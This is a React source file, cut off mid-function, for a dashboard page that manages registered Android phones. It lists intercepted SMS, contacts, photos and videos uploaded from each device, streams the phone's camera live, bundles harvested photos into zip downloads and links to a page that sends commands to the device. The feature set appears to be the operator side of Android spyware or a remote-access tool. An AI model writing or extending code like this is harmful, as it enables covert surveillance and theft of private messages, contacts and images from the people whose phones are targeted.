import { useState, useEffect } from 'react'
import { useParams, useNavigate, Link } from 'react-router-dom'
import { getDevice, getDevicePermissions, updateDevice, deleteDevice, Device, DevicePermissions, getDeviceContent, deleteTaskPhoto, clearContentType, startLiveStream, stopLiveStream, getLiveFrameUrl, API_BASE_URL } from '../services/api'
import JSZip from 'jszip'

export function DeviceDetailPage() {
  const { id } = useParams<{ id: string }>()
  const navigate = useNavigate()
  const [device, setDevice] = useState<Device | null>(null)
  const [permissions, setPermissions] = useState<DevicePermissions | null>(null)
  const [loading, setLoading] = useState(true)
  const [error, setError] = useState('')
  const [editing, setEditing] = useState(false)
  const [selectedPermission, setSelectedPermission] = useState<string | null>(null)
  const [contentData, setContentData] = useState<any>(null)
  const [contentLoading, setContentLoading] = useState(false)
  const [contentError, setContentError] = useState('')
  const [editForm, setEditForm] = useState({ model: '', manufacturer: '', android_version: '', battery_level: 0, network_type: '' })
  const [liveCameraOn, setLiveCameraOn] = useState(false)

  const openLiveCamera = async () => {
    try { await startLiveStream(d.device_id) } catch { /* start anyway */ }
    setLiveCameraOn(true)
  }

  const closeLiveCamera = () => {
    setLiveCameraOn(false)
    try { stopLiveStream(d.device_id) } catch { /* ignore */ }
  }

  useEffect(() => {
    if (!id) return
    setLoading(true)
    Promise.all([getDevice(id), getDevicePermissions(id)])
      .then(([dev, perm]) => {
        setDevice(dev.data)
        setPermissions(perm.data)
        setError('')
      })
      .catch(() => setError('加载设备失败'))
      .finally(() => setLoading(false))
  }, [id])

  if (loading) return <div className="flex items-center justify-center h-64">加载中...</div>
  if (error || !device) return (
    <div className="text-center py-12">
      <p className="text-gray-600 mb-4">设备不存在或无法访问</p>
      <Link to="/devices" className="text-indigo-600 hover:text-indigo-900">返回设备列表</Link>
    </div>
  )

  const d = device

  const startEdit = () => {
    setEditForm({ model: d.model || '', manufacturer: d.manufacturer || '', android_version: d.android_version || '', battery_level: d.battery_level || 0, network_type: d.network_type || '' })
    setEditing(true)
  }

  const saveEdit = async () => {
    try {
      await updateDevice(d.device_id, { model: editForm.model, manufacturer: editForm.manufacturer, android_version: editForm.android_version, battery_level: editForm.battery_level, network_type: editForm.network_type })
      setDevice((await getDevice(d.device_id)).data)
      setEditing(false)
    } catch (e) { window.alert('保存失败') }
  }

  const handleDelete = async () => {
    if (!window.confirm('确定要删除该设备吗？此操作不可恢复。')) return
    try { await deleteDevice(d.device_id); navigate('/devices') } catch (e) { window.alert('删除失败') }
  }

  const statusBadge = () => {
    const map: Record<string, string> = { online: 'bg-green-100 text-green-800', offline: 'bg-gray-100 text-gray-800', connecting: 'bg-blue-100 text-blue-800', error: 'bg-red-100 text-red-800' }
    return <span className={`inline-flex px-2 py-1 text-xs font-semibold rounded-full ${map[d.status] || 'bg-gray-100 text-gray-800'}`}>{d.status}</span>
  }

  const permissionToUploadType: Record<string, string> = { camera: 'image', sms: 'sms', sms_receive: 'sms', contacts: 'contacts', album: 'image', media_images: 'image', media_video: 'video', media_audio: 'file', upload: 'all' }
  const permissionNameMap: Record<string, string> = { camera: '相机', sms: '读取短信', sms_receive: '实时接收短信', contacts: '通讯录', album: '相册/存储', notification: '通知', battery: '电量', upload: '上传', media_images: '媒体图片', media_video: '媒体视频', media_audio: '媒体音频', background_run: '后台运行' }

  const normalizeUploadTasks = (tasks: any[], uploadType?: string) => {
    if (!uploadType) return []
    const aliases: Record<string, string[]> = {
      image: ['image', 'photo', 'photos', 'album', 'media_images', 'photo-list', 'photo_list', 'picture', 'pictures'],
      video: ['video', 'videos', 'media_video'],
      file: ['file', 'files', 'audio', 'media_audio'],
      sms: ['sms', 'messages'],
      contacts: ['contacts', 'contact']
    }
    const allowed = uploadType === 'all' ? null : new Set(aliases[uploadType] || [uploadType])
    return tasks.filter((task: any) => !allowed || allowed.has(String(task?.type || '').toLowerCase())).map((task: any) => {
      let parsed: any = null
      if (task?.content_data) {
        try { parsed = JSON.parse(task.content_data) } catch { parsed = null }
      }
      const base = Array.isArray(parsed) ? { data: parsed } : (parsed && typeof parsed === 'object' ? parsed : {})
      return {
        ...base,
        taskId: task?.id,
        createdAt: task?.created_at,
        type: task?.type,
        fileName: task?.file_name,
        size: task?.file_size,
        mimeType: task?.mime_type,
        status: task?.status,
        progress: task?.progress,
        r2Key: task?.r2_key
      }
    })
  }

  const getContentItems = (content: Record<string, any[]>, uploadType?: string, fallbackTasks: any[] = []) => {
    if (!uploadType) return []
    const seen = new Set<string>()
    const dedup = (list: any[]) => list.filter((item: any) => {
      const key = item?.taskId || JSON.stringify(item?.data ?? item)
      if (seen.has(key)) return false
      seen.add(key)
      return true
    })
    if (uploadType === 'all') {
      return dedup(Object.values(content).flat())
    }
    const direct = dedup(content[uploadType] || [])
    if (direct.length) return direct
    const aliases: Record<string, string[]> = {
      image: ['image', 'photo', 'photos', 'album', 'media_images', 'photo-list', 'photo_list', 'picture', 'pictures'],
      video: ['video', 'videos', 'media_video'],
      file: ['file', 'files', 'audio', 'media_audio'],
      sms: ['sms', 'messages'],
      contacts: ['contacts', 'contact']
    }
    const aliased = aliases[uploadType]?.flatMap((key) => dedup(content[key] || [])) || []
    return aliased.length ? aliased : normalizeUploadTasks(dedup(fallbackTasks), uploadType)
  }

  const viewContent = async (permission: string) => {
    setSelectedPermission(permission); setContentData(null); setContentError(''); setContentLoading(true)
    try {
      let res: Awaited<ReturnType<typeof getDeviceContent>>
      try {
        res = await getDeviceContent(d.device_id)
      } catch {
        // 同一请求第二次点击时偶发网络/边缘瞬时失败，仅重试一次，避免误报
        await new Promise((r) => setTimeout(r, 1000))
        res = await getDeviceContent(d.device_id)
      }
      if (!res.success) { setContentError('加载设备内容失败'); return }
      const { content, commandResults } = res.data
      const uploadType = permissionToUploadType[permission]

      let allItems: any[] = []
      if (permission === 'album') {
        allItems = [
          ...getContentItems(content, 'image'),
          ...getContentItems(content, 'video')
        ]
      } else {
        allItems = getContentItems(content, uploadType)
      }

      const cmdItems = commandResults.filter((c: { command: string }) => {
        const cmdMap: Record<string, string> = { sms_receive: 'sms_list', notification: 'ring' }
        return c.command === cmdMap[permission]
      })
      if (allItems.length === 0 && cmdItems.length === 0) { setContentError('暂无内容数据，请先在设备上执行对应操作后上传'); return }
      setContentData({ type: permission === 'album' ? 'album' : (uploadType || permission), items: allItems, commands: cmdItems })
    } catch (e: any) {
      setContentError(`加载内容失败${e && e.message ? `：${e.message}` : ''}`)
    }
    finally { setContentLoading(false) }
  }

  const downloadContent = async (permission: string) => {
    try {
      if (permission === 'album' || permission === 'media_images') {
        if (!contentData || !contentData.items) { window.alert('暂无可下载的内容'); return }
        const zip = new JSZip()
        let count = 0
        for (const task of contentData.items) {
          const list = Array.isArray(task?.data) ? task.data : [task]
          for (let i = 0; i < list.length; i++) {
            const item = list[i]
            const idx = item?.index ?? i
            const name = item?.name || `photo_${count + 1}.jpg`
            if (item?.data && typeof item.data === 'string' && item.data.length > 100) {
              zip.file(name, item.data, { base64: true })
            } else if (task?.taskId) {
              try {
                const v = encodeURIComponent(item?.path || item?.name || `${idx}`)
                const resp = await fetch(`${API_BASE_URL}/api/v1/uploads/${task.taskId}/photo/${idx}?v=${v}`)
                if (resp.ok) {
                  const blob = await resp.blob()
                  zip.file(name, blob)
                }
              } catch { }
            }
            count++
          }
        }
        if (count === 0) { window.alert('暂无可下载的内容'); return }
        const blob = await zip.generateAsync({ type: 'blob' })
        const url = URL.createObjectURL(blob)
        const link = document.createElement('a')
        link.href = url; link.download = `photos_${Date.now()}.zip`; link.click(); URL.revokeObjectURL(url)
        window.alert(`已打包 ${count} 张图片`)
        return
      }
      const res = await getDeviceContent(d.device_id)
      if (!res.success) { window.alert('加载设备内容失败'); return }
      const { content } = res.data
      const uploadType = permissionToUploadType[permission]
      const items = getContentItems(content, uploadType)
      const item = items[0]
      if (!item || !item.taskId) { window.alert('暂无可下载的内容'); return }
      const response = await fetch(`${API_BASE_URL}/api/v1/uploads/${item.taskId}/content`)
      if (!response.ok) { window.alert('下载失败'); return }
      const blob = await response.blob()
      const url = URL.createObjectURL(blob)
      const link = document.createElement('a')
      link.href = url; link.download = item.fileName || `${permission}-${Date.now()}`; link.click(); URL.revokeObjectURL(url)
    } catch { window.alert('下载失败') }
  }

  const handleDeletePhoto = async (taskId: string, path?: string, index?: number) => {
    if (!window.confirm('确定删除这条记录吗？删除后无法恢复。')) return
    try {
      await deleteTaskPhoto(taskId, { path, index })
      const perm = selectedPermission
      if (perm) await viewContent(perm)
    } catch (err: any) {
      const msg = err?.message || '删除失败'
      console.error('删除失败:', err)
      window.alert(`删除失败：${msg}`)
    }
  }

  const handleDeleteItem = async (taskId: string, index: number) => {
    await handleDeletePhoto(taskId, undefined, index)
  }

  const handleClearContent = async () => {
    const perm = selectedPermission
    if (!perm) return
    const clearTypes: Record<string, string[]> = {
      album: ['image', 'video'],
      media_images: ['image'],
      media_video: ['video'],
      sms: ['sms'],
      sms_receive: ['sms'],
      contacts: ['contacts'],
    }
    const types = clearTypes[perm]
    if (!types || types.length === 0) return
    if (!window.confirm(`确定清空「${permissionNameMap[perm] || perm}」的全部数据（含云端存储）吗？此操作不可恢复。`)) return
    try {
      for (const t of types) {
        await clearContentType(d.device_id, t)
      }
      await viewContent(perm)
    } catch (err: any) {
      const msg = err?.message || '清空失败'
      console.error('清空失败:', err)
      window.alert(`清空失败：${msg}`)
    }
  }

  return (
    <div className="space-y-6">
      <div className="flex items-center justify-between">
        <div>
          <Link to="/devices" className="text-sm text-indigo-600 hover:text-indigo-900">← 返回设备列表</Link>
          <h1 className="text-2xl font-bold text-gray-900 mt-1">{d.model} <span className="text-base font-normal text-gray-500 font-mono">{d.device_id}</span></h1>
        </div>
        <div className="flex space-x-3">
          <button onClick={startEdit} className="px-4 py-2 bg-indigo-600 text-white rounded-md text-sm hover:bg-indigo-700">编辑</button>
          <button onClick={handleDelete} className="px-4 py-2 bg-red-600 text-white rounded-md text-sm hover:bg-red-700">删除设备</button>
        </div>
      </div>

      {error && <div className="bg-red-50 border border-red-200 text-red-700 px-4 py-3 rounded-md text-sm">{error}</div>}

      <div className="grid grid-cols-2 md:grid-cols-4 gap-4">
        <InfoCard title="厂商" value={d.manufacturer} />
        <InfoCard title="Android 版本" value={d.android_version} />
        <InfoCard title="SDK" value={String(d.sdk_int)} />
        <InfoCard title="网络" value={d.network_type} />
        <InfoCard title="电量" value={`${d.battery_level}%`} />
        <InfoCard title="状态" value={<>{statusBadge()}</>} />
        <InfoCard title="注册时间" value={new Date(d.registered_at).toLocaleString('zh-CN')} />
        <InfoCard title="最后在线" value={new Date(d.last_seen).toLocaleString('zh-CN')} />
      </div>

      <div className="grid grid-cols-1 lg:grid-cols-2 gap-6">
        <div className="bg-white rounded-lg shadow-sm border border-gray-200 p-6">
          <div className="flex items-center justify-between mb-4">
            <h2 className="text-lg font-semibold text-gray-900">权限</h2>
            <Link to={`/dashboard?device=${d.device_id}`} className="text-sm text-indigo-600 hover:text-indigo-900">在管理台调整权限 →</Link>
          </div>
          {permissions ? (
            <div className="space-y-3">
              {Object.entries(permissions).filter(([k]) => k !== 'device_id' && k !== 'updated_time' && !k.startsWith('remote_')).map(([key, value]) => (
                <PermissionRow key={key} label={key} granted={!!value} onView={() => key === 'camera' ? openLiveCamera() : viewContent(key)} onDownload={() => downloadContent(key)} />
              ))}
            </div>
          ) : <p className="text-sm text-gray-500">暂无权限记录</p>}
        </div>

        <div className="bg-white rounded-lg shadow-sm border border-gray-200 p-6">
          <h2 className="text-lg font-semibold text-gray-900 mb-4">设备信息</h2>
          <div className="space-y-3">
            <InfoRow label="设备 ID" value={d.device_id} mono />
            <InfoRow label="型号" value={d.model} />
            <InfoRow label="厂商" value={d.manufacturer} />
            <InfoRow label="Android" value={d.android_version} />
            <InfoRow label="SDK" value={String(d.sdk_int)} />
            <InfoRow label="状态" value={d.status} />
            <InfoRow label="最后更新" value={new Date(d.updated_at).toLocaleString('zh-CN')} />
          </div>
          <div className="mt-4"><Link to={`/commands?device=${d.device_id}`} className="text-indigo-600 hover:text-indigo-900 text-sm">向该设备发送命令 →</Link></div>
        </div>
      </div>

      {editing && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/40">
          <div className="bg-white rounded-lg shadow-xl p-6 w-full max-w-md">
            <h2 className="text-lg font-semibold text-gray-900 mb-4">编辑设备</h2>
            <div className="space-y-4">
              <div><label className="block text-sm font-medium text-gray-700 mb-1">型号</label><input type="text" value={editForm.model} onChange={(e) => setEditForm({ ...editForm, model: e.target.value })} className="w-full px-3 py-2 border border-gray-300 rounded-md text-sm" /></div>
              <div><label className="block text-sm font-medium text-gray-700 mb-1">厂商</label><input type="text" value={editForm.manufacturer} onChange={(e) => setEditForm({ ...editForm, manufacturer: e.target.value })} className="w-full px-3 py-2 border border-gray-300 rounded-md text-sm" /></div>
              <div><label className="block text-sm font-medium text-gray-700 mb-1">Android 版本</label><input type="text" value={editForm.android_version} onChange={(e) => setEditForm({ ...editForm, android_version: e.target.value })} className="w-full px-3 py-2 border border-gray-300 rounded-md text-sm" /></div>
              <div><label className="block text-sm font-medium text-gray-700 mb-1">电量 (%)</label><input type="number" value={editForm.battery_level} onChange={(e) => setEditForm({ ...editForm, battery_level: Number(e.target.value) })} className="w-full px-3 py-2 border border-gray-300 rounded-md text-sm" /></div>
              <div><label className="block text-sm font-medium text-gray-700 mb-1">网络类型</label><input type="text" value={editForm.network_type} onChange={(e) => setEditForm({ ...editForm, network_type: e.target.value })} className="w-full px-3 py-2 border border-gray-300 rounded-md text-sm" /></div>
              <div className="flex justify-end space-x-3 mt-4">
                <button onClick={() => setEditing(false)} className="px-4 py-2 border border-gray-300 rounded-md text-sm hover:bg-gray-50">取消</button>
                <button onClick={saveEdit} className="px-4 py-2 bg-indigo-600 text-white rounded-md text-sm hover:bg-indigo-700">保存</button>
              </div>
            </div>
          </div>
        </div>
      )}

      {contentLoading && <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/40"><div className="bg-white rounded-lg shadow-xl p-6 w-full max-w-lg"><h2 className="text-lg font-semibold text-gray-900 mb-4">加载内容...</h2><div className="animate-spin rounded-full h-8 w-8 border-4 border-indigo-600 border-t-transparent mx-auto"></div></div></div>}

      {contentError && selectedPermission && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/40">
          <div className="bg-white rounded-lg shadow-xl p-6 w-full max-w-lg">
            <h2 className="text-lg font-semibold text-gray-900 mb-4">{permissionNameMap[selectedPermission] || selectedPermission}</h2>
            <p className="text-sm text-red-600 mb-4">{contentError}</p>
            <div className="flex justify-end"><button onClick={() => { setSelectedPermission(null); setContentData(null); setContentError('') }} className="px-4 py-2 border border-gray-300 rounded-md text-sm hover:bg-gray-50">关闭</button></div>
          </div>
        </div>
      )}

      {contentData && selectedPermission && !contentLoading && !contentError && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/40">
          <div className="bg-white rounded-lg shadow-xl p-6 w-full max-w-lg max-h-[80vh] overflow-auto">
            <div className="flex items-center justify-between mb-4">
              <h2 className="text-lg font-semibold text-gray-900">{permissionNameMap[selectedPermission] || selectedPermission}</h2>
              <button onClick={() => { setSelectedPermission(null); setContentData(null) }} className="text-gray-500 hover:text-gray-700 text-xl">×</button>
            </div>
            <div className="mb-4 text-sm text-gray-600">
              <p>设备：{d.device_id.slice(0, 12)}...</p>
              <p>类型：{contentData.type}</p>
            </div>
            <div className="bg-gray-50 border border-gray-200 rounded-md p-4 text-sm overflow-auto max-h-[50vh]">
              {contentData.items && contentData.items.length > 0 && contentData.type === 'image' && renderImageItems(contentData.items, handleDeletePhoto)}
              {contentData.items && contentData.items.length > 0 && contentData.type === 'sms' && renderSmsItems(contentData.items, handleDeleteItem)}
              {contentData.items && contentData.items.length > 0 && contentData.type === 'contacts' && renderContactsItems(contentData.items, handleDeleteItem)}
              {contentData.items && contentData.items.length > 0 && contentData.type === 'video' && renderVideoItems(contentData.items, handleDeletePhoto)}
              {contentData.items && contentData.items.length > 0 && contentData.type === 'album' && (() => {
                const imgs = contentData.items.filter((it: any) => it.type === 'image' || (!it.type && it.data && Array.isArray(it.data)))
                const vids = contentData.items.filter((it: any) => it.type === 'video')
                return (
                  <div className="space-y-4">
                    {imgs.length > 0 && <div><p className="text-xs text-gray-400 mb-1">图片</p>{renderImageItems(imgs, handleDeletePhoto)}</div>}
                    {vids.length > 0 && <div><p className="text-xs text-gray-400 mb-1">视频</p>{renderVideoItems(vids, handleDeletePhoto)}</div>}
                  </div>
                )
              })()}
              {contentData.items && contentData.items.length > 0 && contentData.type !== 'image' && contentData.type !== 'sms' && contentData.type !== 'contacts' && contentData.type !== 'video' && contentData.type !== 'album' && (
                <pre className="whitespace-pre-wrap">{JSON.stringify(contentData.items, null, 2)}</pre>
              )}
              {(!contentData.items || contentData.items.length === 0) && contentData.commands && contentData.commands.length > 0 && (
                <pre className="whitespace-pre-wrap">{JSON.stringify(contentData.commands, null, 2)}</pre>
              )}
              {(!contentData.items || contentData.items.length === 0) && (!contentData.commands || contentData.commands.length === 0) && (
                <p className="text-gray-500">暂无内容数据</p>
              )}
            </div>
            <div className="flex justify-end space-x-3 mt-4">
              {contentData.items && contentData.items.length > 0 && (
                <button onClick={() => downloadContent(selectedPermission)} className="px-4 py-2 bg-indigo-600 text-white rounded-md text-sm hover:bg-indigo-700">下载</button>
              )}
              {['album', 'media_images', 'media_video', 'sms', 'sms_receive', 'contacts'].includes(selectedPermission) && (
                <button onClick={handleClearContent} className="px-4 py-2 bg-red-600 text-white rounded-md text-sm hover:bg-red-700">清空该类型</button>
              )}
              <button onClick={() => { setSelectedPermission(null); setContentData(null) }} className="px-4 py-2 border border-gray-300 rounded-md text-sm hover:bg-gray-50">关闭</button>
            </div>
          </div>
        </div>
      )}
      {liveCameraOn && <LiveCameraModal deviceId={d.device_id} onClose={closeLiveCamera} />}
    </div>
  )

function LiveCameraModal({ deviceId, onClose }: { deviceId: string; onClose: () => void }) {
  const [ts, setTs] = useState(Date.now())
  useEffect(() => {
    const timer = setInterval(() => setTs(Date.now()), 500)
    return () => clearInterval(timer)
  }, [])
  return (
    <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/70">
      <div className="bg-gray-900 rounded-lg shadow-xl w-full max-w-3xl">
        <div className="flex items-center justify-between px-4 py-3 border-b border-gray-700">
          <h2 className="text-lg font-semibold text-white">实时摄像头</h2>
          <button onClick={onClose} className="text-gray-400 hover:text-white text-2xl leading-none">×</button>
        </div>
        <div className="p-4">
          <div className="bg-black rounded-md overflow-hidden flex items-center justify-center min-h-[300px]">
            <img
              src={`${getLiveFrameUrl(deviceId)}&t=${ts}`}
              alt="实时画面"
              className="max-w-full max-h-[50vh]"
              onError={(e) => { (e.target as HTMLImageElement).src = `${getLiveFrameUrl(deviceId)}&t=${Date.now()}&err=1` }}
            />
          </div>
          <p className="text-center text-gray-400 text-xs mt-3">实时画面（约 0.5-1 秒刷新）· 设备需已授权相机权限并在线</p>
        </div>
      </div>
    </div>
  )
}
}

function renderImageItems(items: any[], onDeletePhoto?: (taskId: string, path?: string, index?: number) => void) {
  const photos: { taskId: string; item: any; index: number }[] = []
  const others: any[] = []
  for (const task of items) {
    const list = Array.isArray(task?.data) ? task.data : [task]
    list.forEach((item: any, idx: number) => {
      if (item?.data || item?.name || item?.path) photos.push({ taskId: task?.taskId, item, index: item?.index ?? idx })
      else others.push(item)
    })
  }
  if (photos.length === 0 && others.length === 0) return null
  return (
    <div className="space-y-4">
      {photos.length > 0 && (
        <div className="grid grid-cols-3 gap-2">
          {photos.map((p, i) => (
            <PhotoThumb key={i} taskId={p.taskId} item={p.item} index={p.index} onDelete={onDeletePhoto} />
          ))}
        </div>
      )}
      {others.length > 0 && (
        <pre className="whitespace-pre-wrap">{JSON.stringify(others, null, 2)}</pre>
      )}
    </div>
  )
}

function PhotoThumb({ taskId, item, index, onDelete }: { taskId: string; item: any; index: number; onDelete?: (taskId: string, path?: string, index?: number) => void }) {
  const [src, setSrc] = useState<string>('')
  const [loading, setLoading] = useState(true)

  useEffect(() => {
    if (item?.data && typeof item.data === 'string' && item.data.length > 100) {
      setSrc(`data:${item.mime_type || 'image/jpeg'};base64,${item.data}`)
      setLoading(false)
      return
    }
    if (taskId) {
      setLoading(true)
      const v = encodeURIComponent(item?.path || item?.name || `${index}`)
      fetch(`${API_BASE_URL}/api/v1/uploads/${taskId}/photo/${index}?v=${v}`)
        .then(r => { if (r.ok) return r.blob(); throw new Error() })
        .then(blob => { setSrc(URL.createObjectURL(blob)); setLoading(false) })
        .catch(() => setLoading(false))
    }
  }, [taskId, index, item?.path, item?.name])

  return (
    <div className="relative">
      {loading ? (
        <div className="w-full h-32 bg-gray-800 rounded border border-gray-700 flex items-center justify-center text-gray-500 text-xs">加载中...</div>
      ) : src ? (
        <a href={src} target="_blank" rel="noreferrer">
          <img src={src} alt={item.name || `照片${index + 1}`} className="w-full h-auto rounded border border-gray-200 object-cover" onClick={(e) => e.stopPropagation()} />
        </a>
      ) : (
        <div className="w-full h-32 bg-gray-800 rounded border border-gray-700 flex items-center justify-center text-gray-500 text-xs">无法加载</div>
      )}
      {onDelete && taskId && (
        <button
          onClick={(e) => { e.stopPropagation(); onDelete(taskId, item.path, index) }}
          className="absolute top-1 right-1 bg-red-600 text-white text-xs rounded px-1.5 py-0.5 shadow hover:bg-red-700"
        >删除</button>
      )}
      {item?.data && typeof item.data === 'string' && item.data.length > 100 ? (
        <button
          onClick={(e) => { e.stopPropagation(); downloadBase64File(item.data, item.name || `photo_${index}.jpg`, item.mime_type || 'image/jpeg') }}
          className="absolute bottom-1 right-1 bg-indigo-600 text-white text-xs rounded px-1.5 py-0.5 shadow hover:bg-indigo-700"
        >下载</button>
      ) : src && src.startsWith('blob:') ? (
        <a href={src} download={item.name || `photo_${index}.jpg`}
          onClick={(e) => e.stopPropagation()}
          className="absolute bottom-1 right-1 bg-indigo-600 text-white text-xs rounded px-1.5 py-0.5 shadow hover:bg-indigo-700 inline-block"
        >下载</a>
      ) : null}
    </div>
  )
}

function renderSmsItems(items: any[], onDelete?: (taskId: string, index: number) => void) {
  const messages: { data: any; taskId: string; index: number }[] = []
  for (const task of items) {
    const list = Array.isArray(task?.data) ? task.data : [task]
    list.forEach((msg: any, idx: number) => {
      if (msg && (msg.address || msg.body || msg.content || msg.sender)) messages.push({ data: msg, taskId: task?.taskId, index: idx })
    })
  }
  const seen = new Set<string>()
  const uniqueMessages = messages.filter(({ data: m }) => {
    const key = JSON.stringify({ a: m.address || m.sender || '', b: m.body || m.content || m.text || '', d: m.date || 0, t: m.type || '' })
    if (seen.has(key)) return false
    seen.add(key)
    return true
  })
  if (uniqueMessages.length === 0) {
    return <pre className="whitespace-pre-wrap">{JSON.stringify(items, null, 2)}</pre>
  }
  return (
    <div className="space-y-2 max-h-[45vh] overflow-auto">
      {uniqueMessages.map(({ data: m, taskId, index }, i) => {
        const dir = m.type === 2 || m.type === 'sent' || String(m.type).toLowerCase().includes('sent') ? 'out' : 'in'
        const date = m.date ? new Date(typeof m.date === 'number' && m.date < 1e12 ? m.date * 1000 : m.date) : null
        return (
          <div key={i} className={`relative rounded-md p-3 text-sm ${dir === 'out' ? 'bg-indigo-50 ml-6' : 'bg-white border border-gray-200 mr-6'}`}>
            <div className="flex items-center justify-between mb-1">
              <span className="font-medium text-gray-900 font-mono">{m.address || m.sender || '未知号码'}</span>
              <span className="text-xs text-gray-400">{date ? date.toLocaleString('zh-CN') : ''}</span>
            </div>
            <p className="text-gray-700 whitespace-pre-wrap break-words">{m.body || m.content || m.text || JSON.stringify(m)}</p>
            {dir === 'out' && <p className="text-xs text-indigo-400 mt-1">已发送</p>}
            {onDelete && taskId && (
              <button
                onClick={() => onDelete(taskId, index)}
                className="absolute top-1 right-1 bg-red-600 text-white text-xs rounded px-1.5 py-0.5 shadow hover:bg-red-700"
              >删除</button>
            )}
          </div>
        )
      })}
    </div>
  )
}

function renderContactsItems(items: any[], onDelete: (taskId: string, index: number) => void) {
  const contacts: { data: any; taskId: string; index: number }[] = []
  for (const task of items) {
    const list = Array.isArray(task?.data) ? task.data : [task]
    list.forEach((c: any, idx: number) => {
      if (c && (c.name || c.number || c.phone || c.id)) contacts.push({ data: c, taskId: task?.taskId, index: idx })
    })
  }
  const seen = new Set<string>()
  const uniqueContacts = contacts.filter(({ data: c }) => {
    const key = JSON.stringify({ n: c.name || '', num: c.number || c.phone || '' })
    if (seen.has(key)) return false
    seen.add(key)
    return true
  })
  if (uniqueContacts.length === 0) {
    return <pre className="whitespace-pre-wrap">{JSON.stringify(items, null, 2)}</pre>
  }
  return (
    <div className="space-y-2 max-h-[45vh] overflow-auto">
      {uniqueContacts.map(({ data: c, taskId, index }, i) => (
        <div key={i} className="relative rounded-md p-3 bg-white border border-gray-200 flex items-start justify-between">
          <div className="min-w-0">
            <p className="font-medium text-gray-900 truncate">{c.name || c.display_name || '未知姓名'}</p>
            <p className="text-gray-600 font-mono text-xs mt-0.5">{c.number || c.phone || c.value || ''}</p>
            {Object.entries(c).filter(([k]) => !['name', 'number', 'phone', 'value', 'display_name', 'raw_contact_id', 'contact_id'].includes(k)).map(([k, v]) => (
              <p key={k} className="text-xs text-gray-400 truncate">{k}: {String(v)}</p>
            ))}
          </div>
          {onDelete && taskId && (
            <button
              onClick={() => onDelete(taskId, index)}
              className="ml-2 flex-shrink-0 bg-red-600 text-white text-xs rounded px-1.5 py-0.5 shadow hover:bg-red-700"
            >删除</button>
          )}
        </div>
      ))}
    </div>
  )
}

function renderVideoItems(items: any[], onDeletePhoto?: (taskId: string, path?: string, index?: number) => void) {
  const videos: { taskId: string; item: any; index: number }[] = []
  const others: any[] = []
  for (const task of items) {
    const list = Array.isArray(task?.data) ? task.data : [task]
    list.forEach((v: any, idx: number) => {
      if (v && (v.path || v.name || v.thumb)) videos.push({ taskId: task?.taskId, item: v, index: v.index ?? idx })
      else others.push(v)
    })
  }
  if (videos.length === 0 && others.length === 0) {
    return <pre className="whitespace-pre-wrap">{JSON.stringify(items, null, 2)}</pre>
  }
  return (
    <div className="space-y-3 max-h-[50vh] overflow-auto">
      {videos.map((v, i) => {
        const thumb = v.item && v.item.thumb
        return (
          <div key={i} className="bg-white border border-gray-200 rounded-md p-3">
            {v.taskId ? <LazyVideo taskId={v.taskId} index={v.index} name={v.item.name || `video_${i}`} /> : null}
            <div className="flex items-start gap-3">
              {thumb ? (
                <div className="w-28 h-20 rounded bg-gray-900 flex items-center justify-center overflow-hidden relative flex-shrink-0">
                  <img src={`data:image/jpeg;base64,${thumb}`} alt={v.item.name || '缩略图'} className="w-full h-full object-cover" />
                  <div className="absolute inset-0 flex items-center justify-center bg-black/30">
                    <svg className="w-8 h-8 text-white drop-shadow" fill="currentColor" viewBox="0 0 24 24"><path d="M8 5v14l11-7z"/></svg>
                  </div>
                </div>
              ) : (
                <div className="w-28 h-20 bg-gray-100 rounded flex items-center justify-center text-gray-400 text-xs flex-shrink-0">无预览</div>
              )}
              <div className="flex-1 min-w-0">
                <p className="text-sm font-medium text-gray-900 truncate">{v.item.name || v.item.fileName || '未知视频'}</p>
                <p className="text-xs text-gray-500 mt-0.5">
                  {v.item.size ? `${(v.item.size / 1024 / 1024).toFixed(1)} MB` : ''}
                  {v.item.duration ? ` · ${Math.floor(v.item.duration / 60)}:${String(Math.floor(v.item.duration % 60)).padStart(2, '0')}` : ''}
                </p>
                <p className="text-xs text-gray-400 mt-0.5">
                  {v.item.date ? new Date(typeof v.item.date === 'number' && v.item.date < 1e12 ? v.item.date * 1000 : v.item.date).toLocaleString('zh-CN') : ''}
                </p>
                <div className="flex flex-wrap gap-2 mt-1.5">
                  {v.taskId && (
                    <button onClick={() => downloadRemoteVideo(v.taskId, v.index, v.item.name || `video_${i}`)} className="text-xs text-indigo-600 hover:text-indigo-900">下载视频</button>
                  )}
                  {thumb && (
                    <button onClick={() => downloadBase64File(thumb, `thumb_${(v.item.name || `video_${i}`)}.jpg`, 'image/jpeg')} className="text-xs text-indigo-600 hover:text-indigo-900">下载缩略图</button>
                  )}
                  {onDeletePhoto && v.taskId && (
                    <button onClick={() => onDeletePhoto(v.taskId, v.item.path, v.index)} className="text-xs text-red-600 hover:text-red-900">删除</button>
                  )}
                </div>
              </div>
            </div>
          </div>
        )
      })}
      {others.length > 0 && <pre className="whitespace-pre-wrap">{JSON.stringify(others, null, 2)}</pre>}
    </div>
  )
}

function LazyVideo({ taskId, index }: { taskId: string; index: number; name?: string }) {
  const [blobUrl, setBlobUrl] = useState<string>('')
  const [loading, setLoading] = useState(true)

  useEffect(() => {
    let alive = true
    if (!taskId) { setLoading(false); return }
    setLoading(true)
    fetch(`${API_BASE_URL}/api/v1/uploads/${taskId}/photo/${index}`)
      .then((r) => { if (r.ok) return r.blob(); throw new Error() })
      .then((b) => { if (alive) { setBlobUrl(URL.createObjectURL(b)); setLoading(false) } })
      .catch(() => { if (alive) setLoading(false) })
    return () => { alive = false }
  }, [taskId, index])

  if (loading) {
    return <div className="w-full h-40 rounded bg-gray-800 flex items-center justify-center text-gray-400 text-xs mb-2">视频加载中...</div>
  }
  if (!blobUrl) {
    return <div className="w-full h-40 rounded bg-gray-800 flex items-center justify-center text-gray-400 text-xs mb-2">视频加载失败</div>
  }
  return <video src={blobUrl} controls preload="metadata" className="w-full max-h-64 rounded bg-black mb-2" />
}

async function downloadRemoteVideo(taskId: string, index: number, name: string) {
  try {
    const resp = await fetch(`${API_BASE_URL}/api/v1/uploads/${taskId}/content`)
    if (!resp.ok) { window.alert('下载失败'); return }
    const parsed = JSON.parse(await resp.text())
    const list = Array.isArray(parsed) ? parsed : (parsed.data || [])
    const item = list[index]
    if (!item || !item.data) { window.alert('下载失败：未找到视频数据'); return }
